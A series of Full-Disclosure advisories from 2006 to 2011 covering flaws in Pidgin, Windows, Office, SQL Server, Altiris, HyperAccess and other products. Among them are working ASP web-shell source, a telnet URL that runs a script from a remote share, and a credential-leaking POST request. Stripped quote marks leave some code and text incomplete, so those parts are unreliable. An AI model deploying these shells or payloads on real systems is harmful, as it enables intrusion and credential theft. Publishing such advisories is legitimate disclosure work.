[Full-disclosure] Insomnia : ISVA-110822.1 - Pidgin IM Insecure URL Handling Remote Code Execution

2011-08-22 Thread Brett Moore

 Insomnia Security Vulnerability Advisory: ISVA-110822.1

 Name: Pidgin IM Insecure URL Handling Remote Code Execution
 Reported: 21 July 2011
 Vendor Link:
 Affected Products:
Pidgin Instant Messaging Client = 2.9.0
 Original Advisory:
James Burton, Insomnia Security



Pidgin is an open source instant messaging client that allows users
to log in to accounts on multiple chat networks simultaneously.

An insecure URL handling vulnerability exists in Pidgin = 2.9.0
that can be exploited to cause remote code execution.

This vulnerability requires user interaction in the form of clicking
a malicious crafted URL.



Pidgin supports the use of URL handlers in IM sessions.  The Windows build
passes URLs directly to the ShellExecute API where they are executed under
the context of the user running the application.

When passed through a file:// URL a malicious executable can be hosted
and executed off a remote WEBDAV/SMB share.

This vulnerability requires user interaction in the form of clicking a
crafted URL but Pidgins Insert - Link function gives the option of adding
a description which masks the underlying link. 

This makes the task of social engineering the target a trivial one.

This vulnerability has only been confirmed over Google-Talk though
exploitation over other chat networks may be possible.



Upgrade to Pidgin 2.10.0 from http://www.pidgin.im/
The Pidgin changelog can be found http://developer.pidgin.im/wiki/ChangeLog



The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this

 Insomnia Security Vulnerability Advisory: ISVA-110822.1

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Insomnia : ISVA-100216.1 - Windows URL Handling Vulnerability

2010-02-16 Thread Brett Moore

 Insomnia Security Vulnerability Advisory: ISVA-100216.1

 Name: Windows URL Handling Vulnerability 
 Released: 16 February 2010
 Vendor Link: 
 Affected Products:
Windows 2000, Windows XP, Windows 2003, Windows Vista
 Original Advisory: 
Brett Moore, Insomnia Security



A flaw exists with the handling of malformed URL's passed through
the ShellExeute() API. The vulnerability does not directly cause
an issue within Windows itself however, applications that call 
the flawed API may be vulnerable to various attacks, one of which 
is shown in this report.



The vulnerability is reached when the malformed URL contains #: 
and can be used to reference local files.

Two such examples are shown here;

The results will be different dependant on where the URL is used
and which OS platform is in use. 

Some examples are shown here;

Calc.exe is executed without prompt

User is prompted to execute calc.exe

Word Document
User is prompted to open acrobat link

PDF Document
Calc.exe is executed without prompt

Firefox will not follow the URL

Calc.exe is executed without prompt  

 Potential Exploit
Safari will not access the local file through the standard
file:// link, but will execute the local file through the malformed

One method of executable delivery is through the onenote:// 
URL protocol if Microsoft OneNote is installed.

OneNote will automatically open and process a onenote file shared
over an SMB share. Any executables stored within the onenote file
will be cached locally. This is done by downloading the embedded
executables and storing them in a known location.


This file can then be executed through the URL handling vulnerability
leading to an automatic code execution issue through Safari.

Obviously there are some requirements for this exploit;
+ the target user name must be known
+ Microsoft OneNote must be installed
+ SMB access out must be allowed


Microsoft have released a security update to address this issue;



The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
Insomnia Security Vulnerability Advisory: ISVA-100216.1

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Insomnia : ISVA-081209.1 - IE Webdav Request Parsing Heap Corruption Vulnerability

2008-12-10 Thread Brett Moore

 Insomnia Security Vulnerability Advisory: ISVA-081209.1

 Name: IE Webdav Request Parsing Heap Corruption Vulnerability 
 Released: 09 December 2008
 Vendor Link: 
 Affected Products:
Microsoft Internet Explorer 7 Running On Vista
Requires Office 2007
 Original Advisory: 
Brett Moore, Insomnia Security



A vulnerability was found in the way that webdav requests are
cached and then later retrieved by Internet Explorer. This results
in the use of uninitialized memory which under the right situation 
can lead to command execution.



When Internet Explorer loads a file from a webdav share, a copy of
the file is stored in


This copy is used as the cached version of the file, and is loaded 
if a page refresh is done.

If the size of the requested file is larger that 190 characters then
the webdav handling service will not save it correctly.

Internet Explorer assumes that the file was stored, and is cached, so
when a refresh is done it attempts to load the file information from
the cached data.

This leads to a heap corruption with various values read that lead 
to exploitable conditions.



Microsoft have released a security update to address this issue;



The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this

Insomnia Security Vulnerability Advisory: ISVA-081209.1

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Insomnia : ISVA-081020.1 - Altiris Deployment Server Agent - Privilege Escalation

2008-10-22 Thread Brett Moore

 Insomnia Security Vulnerability Advisory: ISVA-081020.1

 Name: Altiris Deployment Server Agent - Privilege Escalation 
 Released: 20 October 2008
 Vendor Link: 
 Affected Products:
Altiris Deployment Server 6.X
 Original Advisory: 
Brett Moore, Insomnia Security



Altiris Deployment Server agent is installed as part of the 
Altiris packages to allow the Deployment Server to manage software
for machines. It is usually installed to 
C:\Program Files\Altiris\AClient and the main running agent 
is called AClient.exe. 

By default the agent runs under the Local System account and is
vulnerable to numerous Shatter Attack vulnerabilities leading
to an attacker running code under the Local System privilege.

We reported a first instance of this vulnerability which was
then patched, we then alerted Symantec to the second vulnerability.



The main windows of the AClient GUI has a hidden button that
can be seen using a resource viewer such as MS Spy++. The
button has a caption of command prompt.

Clicking this button causes the GUI to attempt to call 
CreateProcess() with the following CommandLine parameter.
c:\Program Files\Altiris\AClient\cmd.exe

The AClient GUI also has a ListView control which can be
which can be used to overwrite process memory. Using the
ListView, it is possible to overwrite a static pointer
to modify the CommandLine parameter in such a way that
a cmd.exe shell is executed with SYSTEM level privileges.

We then reported the second issue.

The deployment server agent makes use of the LoadLibrary() API 
function and passes a static address of a string from with the 
data segment.

By exploiting the ListView to overwrite the data segment string, 
it is possible to cause the agent to load a malicious dll file.

From the aclient.exe code
004AA890   PUSH ESI
004AA891   PUSH EDI
004AA892   PUSH AClient.005858A0; ASCII kernel32.dll
004AA897   XOR EDI,EDI
004AA899   CALL DWORD PTR DS:[KERNEL32.LoadLibrar;

The malicious dll file can then spawn a command shell, or similar,
running under the LocalSystem context.



Symantec have released a security update to address this issue;



The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this

Insomnia Security Vulnerability Advisory: ISVA-081020.1

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Insomnia : ISVA-080910.1 - MS Office OneNote URL Handling Vulnerability

2008-09-10 Thread Brett Moore

 Insomnia Security Vulnerability Advisory: ISVA-080910.1

 Name: MS Office OneNote URL Handling Vulnerability
 Released: 10 September 2008
 Vendor Link: 
 Affected Products:
MS Office Onenote 2007
MS Office 2003 and 2007 have vulnerable components
 Original Advisory: 
Brett Moore, Insomnia Security



OneNote is included as part of office 2007, and provides an easy
way to store, manage, and share information.

OneNote installs a URL Handler under the registry key 

with an open command specified as 
  C:\PROGRA~1\MICROS~2\Office12\ONENOTE.EXE /hyperlink %1
Due to the URL Handler, OneNote can be started from Internet
Explorer through a URI reference of 

Where onenotefile is a locally hosted file, or a file accessible
through a UNC/WebDav share.

The instance of onenote started will executed through the 
IEUSER.EXE process running under the currently logged in user.
OneNote is one of the few Microsoft installed applications that
does NOT PROMPT the user, before executing from the URL.

Through the use of command line switches passed to OneNote from 
a URL, we found two exploitation scenarios.



- File Transfer to Client -

OneNote accepts a command switch to specify the location of the
local cache directory. By specifying this switch on the URL It is
possible to specify an arbitrary location on the client, which
will be used to cache the opened notebooks. 

If a notebook is loaded from a remote share, a local copy will be
created under the cache directory. When OneNote caches the notebook
it makes a local copy of any binary files that are embedded inside
the notebook.

This allows the placement of binary files in a 'semi arbitrary'
location that can then be used in conjunction with social engineering
emails, or other attacks that require the knowledge of the location
of a file.

There may also be other attack vectors through the placement of
specially named files within search paths.

- Theft of Users OneNote Notebooks -

OneNote accepts a command switch to specify the location of the
backup directory. 

It is possible to specify a SMB share location on a remote server,
which will be used to backup the notebooks. This results in copies
of all opened notebooks been sent to the remote share.



Microsoft have released a security update to address this issue;



The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this

Insomnia Security Vulnerability Advisory: ISVA-080910.1

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Insomnia : ISVA-080709.1 - Microsoft SQL Server - Corrupt Backup File Heap Overflow

2008-07-09 Thread Brett Moore

 Insomnia Security Vulnerability Advisory: ISVA-080709.1

 Name: Microsoft SQL Server - Corrupt Backup File Heap Overflow
 Released: 09 July 2008
 Vendor Link: 
 Affected Products:
MS SQL Server 2005, possibly previous versions
 Original Advisory: 
Brett Moore, Insomnia Security



Microsoft SQL Server contains a buffer overflow that can be reached
by causing the server to attempt a database restore from a corrupt
back file.

This can be triggered by a user with PUBLIC access through the 
RESTORE TSQL statement, available through the console as well as
through a vulnerable SQL statement on a web server (sql injection) 

By default the service runs under the NETWORK SERVICE account but
has the ability to impersonate through tokens, and therefore
can gain full LOCAL SYSTEM account access.



The following TSQL statement can be called by any user with PUBLIC


By hosting a corrupt SQL database backup on a remote file share
it is possible to force the target server to open the file, parse
it, and corrupt the internal heap.

Obviously the target SQL server must have egress availability to 
connect out through SMB or webdav functionality.

The SQL backup format consists of multiple chunks of data which 
follow a basic structure of
  struct backupChunk {
unsigned long nametag;
unsigned long size;

The nametag describes the type of tag (ex.SCIN, SFGI, MQCI, etc).
The size corresponds to the size of the complete chunk size which 
includes the 8byte chunk header.

The parsing function goes through  file using the backupChunk-size 
field to point to the next valid chunk.

022E5FE3 MOV EAX, [ESP+18h]
022E5FE9 CALL EDX   ;   -- This loads the 8byte header of the block

If the size field is larger than the current buffer, a check 
prevents the application from overflowing.

Size Check
022E6063 MOV EAX,DWORD PTR DS:[EDX+4]  ;- Load Size
022E6066 MOV ECX,DWORD PTR SS:[ESP+14] ;- Load Buffer Size
022E606C JS SHORT sqlservr.022E6076
022E606E CMP EAX,DWORD PTR DS:[EBX+C8] ;- Compare against 0x2000
022E6074 JBE SHORT sqlservr.022E60DC   ;- Jump to continuation

After this size comparison, the size is adjusted to subtract the
size of the 8byte structure header.

The size decrease
022E60E3 SUB EDI,8; - Subtract 8 bytes
022E60E6 CMP DWORD PTR DS:[EBX+40],0
022E60EA JA SHORT sqlservr.022E6107

If the structure size was a value between 0 and 7 then an Integer 
Underflow/Overflow/Wraparound/Whatever will occur, and the 
'negative' large value is passed directly into the StartRead

The write
022E6118 PUSH EDI; - Push the new 'negative' size
022E6119 PUSH EAX
022E611E ADD EAX,8
022E6121 PUSH EAX
022E6122 PUSH ESI
022E6123 CALL EDX;  call StartRead
022E6125 PUSH EBX

StartRead, among other things, uses the size value in a call to 
_memcpy, that will read the available data from the file 
overflowing the buffer and overwriting heap memory.

022D44BC MOV EBX,[EBP+arg_4]
022D44BF PUSH ESI  ; - The 'negative' size
022D44C0 PUSH EAX  ; void *
022D44C1 PUSH EBX  ; void *
022D44C2 CALL _MEMCPY  ; - Call to memcpy

The result of exploitation is that heap memory is overflowed. 

We have had successful exploitable 'exceptions' in the following 

A 'write 4'
0116D35A JE sqlservr.011C6BCE

[Full-disclosure] Insomnia : ISVA-080516.1 - Altiris Deployment Solution - SQL Injection

2008-05-18 Thread Brett Moore

 Insomnia Security Vulnerability Advisory: ISVA-080516.1

 Name: Altiris Deployment Solution - SQL Injection
 Released: 16 May 2008
 Vendor Link: 
 Affected Products:
Altiris Deployment Solution 6.8.x  6.9.x
 Original Advisory: 
Brett Moore, Insomnia Security



Altiris deployment solution is a suite installed to manage the 
configuration and operation of machines on the network. SQL Server 
is used as the backend database. 

Altiris deployment solution listens for connections from the Altiris
client on port 402. It is possible to make a request that will 
result in the exploitation of a SQL Injection vulnerability. This 
leads to database access under the context of the Deployment server,
which typically then allows, command execution under the context of 
the SQL Server.

Note that through access to the SQL server, it is possible to take 
control of all clients managed by the server.


When a client machine that is running Altiris client 'comes alive'
it makes contact with the Deployment server and sends a 
notification packet to alert the server that the client machine 
is available. 

This packet is an ASCII based packet with a terminating NULL 

At least two of the strings contained in this packet can be used 
to inject arbitrary SQL syntax into a SQL call, resulting in 
SQL injection.



Symantec have released a security update to address this issue;



The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this

Insomnia Security Vulnerability Advisory: ISVA-080516.1

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Insomnia : ISVA-080516.2 - Altiris Deployment Solution - Domain Account Disclosure

2008-05-18 Thread Brett Moore

 Insomnia Security Vulnerability Advisory: ISVA-080516.2

 Name: Altiris Deployment Solution - Domain Account Disclosure
 Released: 16 May 2008
 Vendor Link: 
 Affected Products:
Altiris Deployment Solution 6.8.x  6.9.x
 Original Advisory: 
Brett Moore, Insomnia Security



Altiris deployment solution is a suite installed to manage the 
configuration and operation of machines on the network. Part of 
the Deployment solution setup involves configuring the domain 
accounts to be used to access the various clients for imaging 
and configuration jobs.

Altiris deployment solution listens for connections from the 
Altiris client on port 402. It is possible to make a request to 
this port that will result in the encrypted domain credentials 
being returned.  

The encryption is not salted or specific to the install, allowing 
for offsite decryption of the credentials.



The retrieved encrypted credentials can be placed into a local
installation, through direct insertion into the SQL server
database. The GUI can then be used to view the decrypted 

Alternatively a standalone tool to decrypt the credentials could 
easily be written.



Symantec have released a security update to address this issue;



The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this

Insomnia Security Vulnerability Advisory: ISVA-080516.2

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SUN Java JNLP Overflow

2007-07-11 Thread Brett Moore

= SUN Java JNLP Overflow
= Vendor Advisory:  
= http://sunsolve.sun.com/search/document.do?assetkey=1-26-102996-1
= Affected Software:
=  Java Web Start in JDK and JRE 6 Update 1 and earlier
=  Java Web Start in JDK and JRE 5.0 Update 11 and earlier
= Public disclosure on Wednesday July 11, 2007

== Overview ==


My guess is that two years down the track, nobody really took any

EEYE posted out there advisory, a couple of days ago. Check it if you 
want the technical details.

Not surprising that it was also discovered by another person, and most
likely more than one.

1) Start-Regedit
2) Edit-Search-editflags
3) Find those that have a flag set of BINARY 00 00 01 00
4) *yawn*
5) Find a valid file of that type
6) Try a long string in an obvious place
7) Watch the debugger kick in
8) Finish your cup of coffee

== Solutions ==

SUN has released a patch

This class of vulnerability is well known, and future cases can be 
mitigated by removing or modifying the editflags value for all
registry entries that have 'Disable Open/Save dialog box' set.

== Credit ==

Discovered and advised to SUN November 15 2006 by Brett Moore of

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients.

Security-Assessment.com is committed to security research and 
development, and its team continues to identify and responsibly publish 
vulnerabilities in public and private software vendor's products. 
Members of the Security-Assessment.com RD team are globally recognised 
through their release of whitepapers and presentations related to new 
security research.

Security-Assessment.com is an Endorsed Commonwealth Government of 
Australia supplier and sits on the Australian Government 
Attorney-General's Department Critical Infrastructure Project panel. 
We are certified by both Visa and MasterCard under their Payment 
Card Industry Data Security Standard Programs.

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Lizardtech DjVu Browser Plug-in - Multiple Vulnerabilities

2007-02-15 Thread Brett Moore

= Lizardtech DjVu Browser Plug-in - Multiple Vulnerabilities
= Vendor Website: 
= http://www.lizardtech.com/
= Affected Version:
=Windows DjVu Browser Plug-in  6.1.1
= Public disclosure on February 15th 2007

== Overview ==

The DjVu Browser Plug-in is the primary means of viewing DjVu documents.

It runs inside most modern browsers including IE, Firefox and Safari.

Versions prior to 6.1.1 are vulnerable to buffer overflows through
various functions. One such example is through the ExportImageAs method.

It should be noted that CERT contacted Lizardtech at about the same time

as we did, advising of numerous overflow problems as well. These have
also been addressed by this update.

== Solutions ==

- Upgrade to version 6.1.1 from the lizardtech website
== Credit ==

Discovered and advised to Lizardtech November 2006, by Brett Moore of

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients.

Security-Assessment.com is committed to security research and 
development, and its team continues to identify and responsibly publish 
vulnerabilities in public and private software vendor's products. 
Members of the Security-Assessment.com RD team are globally recognised 
through their release of whitepapers and presentations related to new 
security research..

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MS Interactive Training .cbo Overflow

2007-02-14 Thread Brett Moore

= MS Interactive Training .cbo Overflow
= MS Bulletin posted: 
= http://www.microsoft.com/technet/security/bulletin/MS07-005.mspx
= Affected Software:
=Microsoft Windows 2000
=Microsoft Windows XP  
=Microsoft Windows Server 2003
= Public disclosure on February 14, 2007

== Overview ==

When thinking about buffer overflow vulnerabilities, a file can
be as harmful as a packet. Even though past security issues have taught
us that it is unwise to use a string from a file/packet without first
checking its length, this is what happened here.

MS Interactive Training will open a file with a .cbo extension and read 
in the Syllabus details.

Through the creation of a corrupt file, with a long Syllabus string it
possible to gain control of EIP and execute arbitrary code.

== Exploitation ==

Remote exploitation through Internet Explorer can be obtained through 
hosting a malicious .cbo file which will be downloaded and opened 

== Solutions ==

- Install the vendor supplied patch.

== Credit ==

Discovered and advised to Microsoft May, 2006 by Brett Moore of

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients.

Security-Assessment.com is committed to security research and 
development, and its team continues to identify and responsibly publish 
vulnerabilities in public and private software vendor's products. 
Members of the Security-Assessment.com RD team are globally recognised 
through their release of whitepapers and presentations related to new 
security research.

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Project Server 2003 - Credential Disclosure

2006-12-15 Thread Brett Moore
% Project Server 2003 - Credential Disclosure

Microsoft Project server 2003 implements a thick client
for some of the functionality. The thick client uses
XML requests to talk to the server of HTTP(S).

One of these requests returns the username and password
of the MSProjectUser account used to access the SQL
database as well as other system information.

POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0
Accept: */*
Accept-Language: en-nz
Pragma: no-cache
Content-length: 87
Proxy-Connection: Keep-Alive
Cookie: PjSessionID=valid cookie



Some quick notes that mitigate this attack;
* The cookie must be a valid cookie, which is obtained via a 
  login with a valid username and password.
* Since the thick client is 'client side' any sql can be 
  manipulated anyway.
* The MSProjectUser should be a low level account anyway
* Other 'undocumented' or 'unauthorised' requests 'may' also 
  be able to be made through this method.


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ASP Cmd Shell On IIS 5.1

2006-12-13 Thread Brett Moore

% ASP Cmd Shell On IIS 5.1

ASP shells have been around since the dawn of time. On IIS 5.0 and prior
was simple to create a 'command prompt shell' using code similar to;

Set oS = Server.CreateObject(WSCRIPT.SHELL)
output = oS.exec(cmd.exe  /c   request(command)).stdout.readall
response.write output

Permissions changes in IIS 5.1 prevented this method from working as 
execution access was revoked to the IUSR_Machine user.

During one boring afternoon it was decided to find a way around this,
what we found was 'slightly' interesting.

When IIS checks to see if an executable has 'execute' rights it is 
checking against IUSR_Machine. If execute rights are granted then the 
new process is created, under the IWAM_Machine account. 

Thus all that was needed was an executable that could be run by
and would then spawn an instance of cmd.exe.

We set about seeing what executables could be run by IUSR_Machine. It
out that execution access has been revoked to all files with the .exe
extension. We did however locate several .com files that could still be
executed. One in particular 'win.com' takes a command line as a
and will execute it.

Because of the 'double spawning' we can not make use of .stdout.readall,
need to revert to outputting to a file, and reading it back in.

Due to the process executing under a different account than that of the
processor, we need to jump through a couple of hoops. 
* The folder that we use must be WRITEABLE by IWAM_Machine
* The folder that we use must be READABLE by IUSR_Machine
* We need to alter file permissions to allow IUSR_Machine access to read

  the file created by IWAM_Machine

The accesschk tool from sysinternals, can easily identify a valid
Our testings came up with c:\windows\pchealth\ERRORREP\QHEADLES\

IIS6.0 revokes access to both IUSR_Machine and IWAM_Machine, and
this technique will not work on that platform.

Dim oS,oSNet,oFSys, oF,szCMD, szTF
On Error Resume Next
Set oS = Server.CreateObject(WSCRIPT.SHELL)
Set oSNet = Server.CreateObject(WSCRIPT.NETWORK)
Set oFSys = Server.CreateObject(Scripting.FileSystemObject)
szCMD = Request.Form(C)

If (szCMD  ) Then
  szTF = c:\windows\pchealth\ERRORREP\QHEADLES\   oFSys.GetTempName()
  ' Here we do the command
  Call oS.Run(win.com cmd.exe /c   szCMD  szTF 
  response.write szTF
  ' Change perms
  Call oS.Run(win.com cmd.exe /c cacls.exe   szTF   /E /G
  Set oF = oFSys.OpenTextFile(szTF,1,False,0)
End If 
FORM action=%= Request.ServerVariables(URL) % method=POST
input type=text name=C size=70 value=%= szCMD %
input type=submit value=Run/FORMPRE
Machine: %=oSNet.ComputerName%BR
Username: %=oSNet.UserName%br
If (IsObject(oF)) Then
  On Error Resume Next
  Response.Write Server.HTMLEncode(oF.ReadAll)
  Call oS.Run(win.com cmd.exe /c del  szTF,0,True)
End If 


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] HyperAccess - Multiple Vulnerabilities

2006-12-13 Thread Brett Moore
Not long now...

= Hyper Access - Multiple Vulnerabilities
= Vendor Website:  
= http://www.hilgraeve.com
= Affected Software:
=   Hyper Access 8.4 (and possibly lower)
= Public disclosure on Thursday December 14, 2006

== Overview ==

HyperAccess is the official FULL-POWERED upgrade from HyperTerminal and 
HyperTerminal Private Edition. It is the product from which
and HyperTerminal Private Edition are derived. HyperAccess offers a wide

array of additional capabilities, with a similar look andfeel.

This advisory discloses two separate (but similar) security issues in 
the latest version of HyperAccess .

* Command Execution Through .HAW Opening * 

HyperAccess saves 'sessions' as .haw files. These extensions are setup
open without user intervention, through the editflags setting the in the

registry key: 


If a user, using Internet Explorer, browses to a web site that hosts a 
.HAW, an automatic download and open can be forced. The file will be
opened and parsed by the installed version of HyperAccess.

A .HAW file can be saved with an option 'Script To Run Before
and this can be setup to load  a script file from either an SMB share or

a WEBDAV web share. 

The script command offered by HyperAccess include built in commands as 
well as standard vbscript. This allows the creation of a script that 
uses WScript.Shell to spawn other executables.

This attack requires the target to visit the attackers website, and be
able to connect to the remote share.

A suggested fix is to remove/modify the editflags setting to prevent the

automatic opening and parsing of .HAW files.

* Command Execution Through Telnet URL Protocol *

HyperAccess sets up a URL Protocol to handle the telnet:// URL handler. 
This setting can be viewed in the registry key:

which is set to 
  c:\program files\hawin32\hawin32.exe /t %1

HyperAccess will accept /r as a command line parameter to specify a 
script file to run. This command can be passed on the URL through
Explorer using a URL such as;

  telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt

Where SERVER is an SMB share or a WEBDAV web share hosting a malicious 
script to run.

The script command offered by Hyperaccess include built in commands as 
well as standard vbscript. This allows the creation of a script that 
uses WScript.Shell to spawn other executables.

This attack requires the target to visit the attackers website, and be
able to connect to the remote share.

A suggested fix is to remove the telnet handler from the registry.

== Solutions ==

Currently, the issues outlined in the report have been added to a 
list of issues to evaluate during the next update of HyperACCESS.
There is currently no planned date for this update.

== Credit ==

Discovered and advised to Hilgraeve November 10, 2006 by Brett Moore of

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients.

Security-Assessment.com is committed to security research and 
development, and its team continues to identify and responsibly publish 
vulnerabilities in public and private software vendor's products. 
Members of the Security-Assessment.com RD team are globally recognised 
through their release of whitepapers and presentations related to new 
security research.

Security-Assessment.com is an Endorsed Commonwealth Government of 
Australia supplier and sits on the Australian Government 
Attorney-General's Department Critical Infrastructure Project panel. 
We are certified by both Visa and MasterCard under their Payment 
Card Industry Data Security Standard Programs.

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[Full-disclosure] [SBDA] SiteKiosk - FileSystem Access

2006-12-12 Thread Brett Moore
Still time before Christmas.

= SiteKiosk - FileSystem Access
= Vendor Website:  
= http://www.sitekiosk.com/
= Affected Software:
=   SiteKiosk  6.5.150
= Public disclosure on Tuesday December 12, 2006

== Overview ==

SiteKiosk is an application used to secure public access terminals. It
designed to provide a safe and stable way for the use of public access 
terminals with or without access to the Internet.

SiteKiosk is based on Internet Explorer and can be configured to 
individually restrict access to Web sites, the operating system, 
system settings, and applications. Your computer will be protected
any manipulation from the time you boot until you shut it down. 

SiteKiosk suffers from a cross site scripting vulnerability, that leads
to filesystem access.

== Exploitation ==

SiteKiosk implements a 'skinning' feature so that the layout and display

of the browser can be modified. The 'skinning' feature uses an HTML
control for the modified title bar of the main SiteKiosk window.

SiteKiosk displays the URL of the current location in the title bar of 
the main window, and therefore any HTML code in the location will be 
included in the title bar.

By default, SiteKiosk does not properly handle the ABOUT: prefix. The
is directly outputted to the screen leading to a normal cross site

Because the URL is also outputted to the title bar, script can be
under the LOCAL computer zone. 

If a user types the following into the address box, or browses a site
sets the location to; ABOUT:helloa href=\click here/a 

The title bar will display a hyperlink. By clicking on this HREF in the 
main windows title bar, the filesystem will be accessed with an explorer

SiteKiosk also installs some activeX controls that are marked 'safe
for scripting'. One of these controls exposes two dangerous methods that
allow a SiteKiosk user to read and download any file from the kiosk
with the permissions of the user running SiteKiosk.

== Solutions ==

A new version of SiteKiosk has been released that addresses these
vulnerabilities. It can be downloaded from http://www.sitekiosk.com.

== Credit ==

Discovered and advised to SiteKiosk November 30, 2006 by Brett Moore of

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients.

Security-Assessment.com is committed to security research and 
development, and its team continues to identify and responsibly publish 
vulnerabilities in public and private software vendor's products. 
Members of the Security-Assessment.com RD team are globally recognised 
through their release of whitepapers and presentations related to new 
security research.

Security-Assessment.com is an Endorsed Commonwealth Government of 
Australia supplier and sits on the Australian Government 
Attorney-General's Department Critical Infrastructure Project panel. 
We are certified by both Visa and MasterCard under their Payment 
Card Industry Data Security Standard Programs.

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ASP.DLL Include File Buffer Overflow

2006-07-19 Thread Brett Moore

= ASP.DLL Include File Buffer Overflow
= MS Bulletin posted: 
= http://www.microsoft.com/technet/security/Bulletin/MS06-034.mspx
= Affected Software:
=IIS 5.0
=IIS 5.1
=IIS 6.0
= Public disclosure on July 19, 2006

== Overview ==

A buffer overflow exists in ASP.DLL that can be exploited by creating
a .asp file containing a parameter for the include SSI command.

  !-- #include file=long buffer --OVERFLOWDATA

The include function in ASP.DLL, checks if the parameter is longer than 
260 bytes. If it is then an error is caused, but before causing the
a miscalculated copy is done.

  mov edi, [ebp+var_228]   ; load length of parameter
  cmp edi, 104h; check if larger than 260 bytes
  jbe short loc_
  mov esi, [ebp+var_22C]   ; load address of parameter
  lea eax, [edi+esi-104h]  ; load eax with the address of the last 
   ; 260 bytes of the parameter
   ; (length of string+source of string)-
  lea edx, [ebp+var_211]   ; load edx with address on stack
  sub edx, eax ; 
  mov cl, [eax];  \
  mov [edx+eax], cl;   do the copy
  inc eax  ;   and overflow the stack
  testcl, cl   ;  /
  jnz short loc_7096D1F3   ;  

Funnily enough, the solution was to remove this copy as the resulting 
data was never actually used.

== Exploitation ==

Exploitation requires the ability to upload or somehow create a file
a .asp extension in a folder that will allow .asp processing. 

Since ASP.DLL usually runs under the IWAM_ account, there is no
escalation through this vulnerability. It is however possible to bypass
any security restrictions enforced by ASP. It also allows for the 
execution of APIS that have no ASP equivalent.

== Solutions ==

- Install the vendor supplied patch.

== Credit ==

Discovered and advised to Microsoft February, 2006 by Brett Moore of

Same Bug Different App

In memory of;

== About Security-Assessment.com ==

Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors

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Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Skype - URI Handler Command Switch Parsing

2006-05-21 Thread Brett Moore

= Skype - URI Handler Command Switch Parsing
